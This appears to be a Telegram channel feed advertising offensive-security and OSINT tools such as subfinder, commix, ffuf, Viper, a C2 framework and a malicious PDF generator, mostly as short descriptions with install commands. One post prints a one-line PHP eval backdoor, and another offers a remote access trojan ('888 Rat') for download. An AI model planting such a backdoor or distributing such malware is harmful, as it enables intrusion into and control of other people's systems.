BugCod3

Subfinder

subfinder

is a subdomain discovery tool that returns valid subdomains for websites, using passive online sources. It has a simple, modular architecture and is optimized for speed.

subfinder

is built for doing one thing only - passive subdomain enumeration, and it does that very well. We have made it to comply with all the used passive source licenses and usage restrictions. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike. ⚪️ Fast and powerful resolution and wildcard elimination modules ⚪️ Curated passive sources to maximize results ⚪️ Multiple output formats supported (JSON, file, stdout) ⚪️ Optimized for speed and lightweight on resources ⚪️ STDIN/OUT support enables easy integration into workflows GitHub #Osint #BugBounty #SubDomains ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Gobuster Gobuster is a tool used to brute-force: ⚪️ URIs (directories and files) in web sites. ⚪️ DNS subdomains (with wildcard support). ⚪️ Virtual Host names on target web servers. ⚪️ Open Amazon S3 buckets ⚪️ Open Google Cloud buckets ⚪️ TFTP servers GitHub #Go #Dns #Web #Pentesting #Tools ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Dork Scraper Scrape website URLs using Google Dorks. GitHub #RedTeam #Dork #Scraper #Google ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Commix (short for [comm]and [i]njection e[x]ploiter) is an open source penetration testing tool, written by Anastasios Stasinopoulos (@ancst), that automates the detection and exploitation of command injection vulnerabilities. Installation You can download commix on any platform by cloning the official Git repository :

$ git clone https://github.com/commixproject/commix.git commix

Alternatively, you can download the latest tarball or zipball. Note: Python (version 2.6, 2.7 or 3.x) is required for running commix. Usage To get a list of all options and switches use:

$ python commix.py -h

To get an overview of commix available options, switches and/or basic ideas on how to use commix, check usage, usage examples and filters bypasses wiki pages. GitHub #RedTeam #BugBounty #Command_Injection #Tools ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

ffuf - Fuzz Faster U Fool A fast web fuzzer written in Go. Installation Download a prebuilt binary from releases page, unpack and run! or If you are on macOS with homebrew, ffuf can be installed with:

brew install ffuf

or If you have recent go compiler installed:

go install github.com/ffuf/ffuf/v2@latest

(the same command works for updating) or

git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Ffuf depends on Go 1.16 or greater. GitHub #Web #InfoSec #Fuzzer ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Penetration-Testing-Tools A collection of my Penetration Testing Tools, Scripts, Cheatsheets This is a collection of more than a 160+ tools, scripts, cheatsheets and other loots that I've been developing over years for Penetration Testing and IT Security audits purposes. Most of them came handy at least once during my real-world engagements. Notice: In order to clone this repository properly - use

--recurse-submodules

switch: git clone --recurse https://github.com/mgeeky/Penetration-Testing-Tools.git GitHub #RedTeam #Pentesting #Tools ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Awesome-Bugbounty-Writeups A list of writeups in the field of Bug Bunty GitHub #Writeup ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

888 Rat Download #Rat #Windows #Android ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

pwndrop pwndrop is a self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV. If you've ever needed to quickly set up an nginx/apache web server to host your files and you were never happy with the limitations of python -m SimpleHTTPServer, pwndrop is definitely for you! GitHub #RedTeam #Self_Hosted #file_sharing ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

CobaltStrike support Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module GitHub #RedTeam #Cobalt_Strike #Cross_Platform ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Snoop Project Snoop Project One of the most promising OSINT tools to search for nicknames This is the most powerful software taking into account the CIS location. Is your life slideshow? Ask Snoop. Snoop project is developed without taking into account the opinions of the NSA and their friends, that is, it is available to the average user GNU/Linux ✅ Windows 7/10 (32/64) ✅ Android (Termux) ✅ macOS ❗️ IOS 🚫 WSL 🚫 GitHub Download #RedTeam #Scanner #Osint #Username_Search ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Grabber Zone-H Download #Grabber #ZoneH ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Full-featured C2 framework which silently persists on webserver via polymorphic PHP oneliner Overview The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features Efficient: More than 20 plugins to automate privilege-escalation tasks Stealth: The framework is made by paranoids, for paranoids Convenient: A robust interface with many crucial features Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD-like
Mac OS X
Windows NT

GitHub #RedTeam #Web_Hacking #HackTool ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

WinPwn To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. GitHub #RedTeam #PowerShell #Pentesting ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

VIPER ⚪️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration ⚪️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on ⚪️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories ⚪️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold ⚪️ Viper supports running native msfconsole in browser and multi - person collaboration Site Installation manual GitHub #RedTeam #Viper #Post_Exploitation ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Malicious PDF Generator ☠️ Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh Usage ┌──(BugCod3㉿kali)-[~] └─$ python3 malicious-pdf.py burp-collaborator-url Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory. Purpose ⚪️ Test web pages/services accepting PDF-files ⚪️ Test security products ⚪️ Test PDF readers ⚪️ Test PDF converters GitHub #RedTeam #PDF #Pentesting ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Kubernetes Goat ✨ The Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security 🚀 🏆 Scenarios Sensitive keys in codebases DIND (docker-in-docker) exploitation SSRF in the Kubernetes (K8S) world Container escape to the host system Docker CIS benchmarks analysis Kubernetes CIS benchmarks analysis Attacking private registry NodePort exposed services Helm v2 tiller to PwN the cluster - [Deprecated] Analyzing crypto miner container MORE+++ GitHub #RedTeam #Security #Vuln_App ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

Brave Browser The new Brave browser blocks ads and trackers that slow you down and invade your privacy. Discover a new way of thinking about how the web can work. Download GitHub #Brave #Browser ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3

RedTeam-Tools This github repository contains a collection of 125+ tools and resources that can be useful for red teaming activities. Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context. GitHub BlueTeam-Tools #RedTeam ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/MRvirusIRBOT 📢 T.me/BugCod3